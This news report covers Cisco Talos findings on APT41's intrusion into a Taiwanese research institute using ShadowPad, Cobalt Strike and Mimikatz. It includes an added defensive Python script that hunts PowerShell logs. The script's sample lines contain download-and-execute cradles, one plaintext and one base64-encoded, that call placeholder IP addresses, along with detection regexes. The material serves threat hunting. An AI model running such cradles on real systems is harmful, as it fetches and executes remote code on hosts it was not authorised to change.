APT41 hackers use ShadowPad and Cobalt Strike in cyberattack on Taiwan Institute
August 2, 2024Ravi LakshmananCyber ​​espionage / malware

A Taiwanese government-affiliated research institute specializing in computing and related technologies was hacked by China-linked nation-state threat actors, according to new findings from Cisco Talos.

The unnamed entity was targeted as early as mid-July 2023 to deliver various backdoors and post-compromise tools such as ShadowPad and Cobalt Strike. The activity is attributed with moderate confidence to a prolific hacking group tracked as APT41.

“The ShadowPad malware used in the current campaign used an outdated, vulnerable version of the Microsoft Office IME binary as a bootloader to download a customized second-stage bootloader to launch the payload,” security researchers Joey Chen, Ashley Shen, and Vitor Ventura said.

“The threat actor compromised three hosts in the target environment and was able to steal some documents from the network.”

Cisco Talos said it discovered the activity in August 2023 after spotting what it called “abnormal PowerShell commands” that connected to an IP address to download and execute PowerShell scripts in the compromised environment.

The exact initial access vector used in the attack is unknown, although it involved using a web shell to maintain persistent access and drop additional payloads such as ShadowPad and Cobalt Strike, the latter delivered via a Go-based Cobalt Strike loader called CS-Avoid-Killing.

“The Cobalt Strike malware was designed to use an anti-AV loader to bypass AV detection and avoid security product quarantine,” the researchers said.

Alternatively, the threat actor has been observed running PowerShell commands to launch scripts responsible for executing ShadowPad directly in memory and fetching the Cobalt Strike malware from the command-and-control (C2) server. A DLL-based ShadowPad loader, also called ScatterBee, is executed via DLL sideloading.
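The “abnormal PowerShell commands” that led to discovery, and the PowerShell-driven fetch of the Cobalt Strike payload described above, are the kind of behaviour a defender can hunt for in script-block logs. The following is an added example (not code from Cisco Talos or the article) that scans constructed Event ID 4104-style log lines for download cradles pointing at raw IP addresses, in-memory execution and encoded commands; the hosts, users and IPs are placeholders.

```python
import base64
import re

# Constructed sample PowerShell script-block log lines (Event ID 4104 style).
# Hosts, users and IPs are placeholders, not indicators from the Talos report.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/b.ps1')"
    .encode("utf-16le")).decode()
SAMPLE_LOGS = [
    "4104 host=WS01 user=guest ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')",
    "4104 host=WS01 user=svc_backup ScriptBlockText=Get-ChildItem C:\\Reports | Export-Csv C:\\tmp\\r.csv",
    f"4104 host=FS02 user=guest ScriptBlockText=powershell -nop -w hidden -EncodedCommand {_ENCODED}",
    "4104 host=FS02 user=admin ScriptBlockText=Invoke-WebRequest -Uri https://updates.example.com/patch.msi -OutFile C:\\Temp\\patch.msi",
    "4104 host=DB01 user=ops ScriptBlockText=Restart-Service Spooler",
]

LINE_RE = re.compile(r"host=(?P<host>\S+) user=(?P<user>\S+) ScriptBlockText=(?P<script>.*)$")
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
RULES = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded_command": ENC_RE,
}

def expand_encoded(script: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so the rules see it too."""
    m = ENC_RE.search(script)
    if not m:
        return script
    try:
        return script + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return script

def analyze(lines):
    """Return findings for script blocks that fetch from a raw IP or run fetched code in memory."""
    findings = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        text = expand_encoded(m["script"])
        hits = [name for name, rx in RULES.items() if rx.search(text)]
        # A downloader or encoded command alone is common admin noise; pair it with a
        # raw-IP URL or in-memory execution before raising a finding.
        if ("download_cradle" in hits or "encoded_command" in hits) and \
           ("raw_ip_url" in hits or "in_memory_exec" in hits):
            findings.append({"host": m["host"], "user": m["user"], "rules": hits})
    return findings

for finding in analyze(SAMPLE_LOGS):
    print(finding)
```

The two flagged lines are the plaintext cradle on WS01 and the encoded cradle on FS02; the legitimate Invoke-WebRequest to a hostname is not raised.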

Some of the other steps performed as part of the infiltration included using Mimikatz to extract passwords and running several commands to collect information about user accounts, directory structures, and network configuration.

“APT41 created a custom bootloader to introduce a proof of concept CVE-2018-0824 directly into memory, using a remote code execution vulnerability to achieve local privilege escalation,” Talos said, noting that the final payload, UnmarshalPwn, is unpacked after going through three different stages.

Cisco Talos also drew attention to the adversary’s attempts to avoid detection by halting its own activity whenever other users were detected on the system. “Once the backdoor is deployed, the attacker will remove the web shell and guest account that allowed the initial access,” the researchers said.

The disclosure comes as Germany revealed earlier this week that Chinese state actors were behind a 2021 cyber attack on the country’s national mapping agency, the Federal Bureau of Mapping and Geodesy (BKG), carried out for espionage purposes.

The Chinese embassy in Berlin responded by calling the accusation baseless and urging Germany to “stop the practice of using cyber security issues to defame China politically and in the media”.
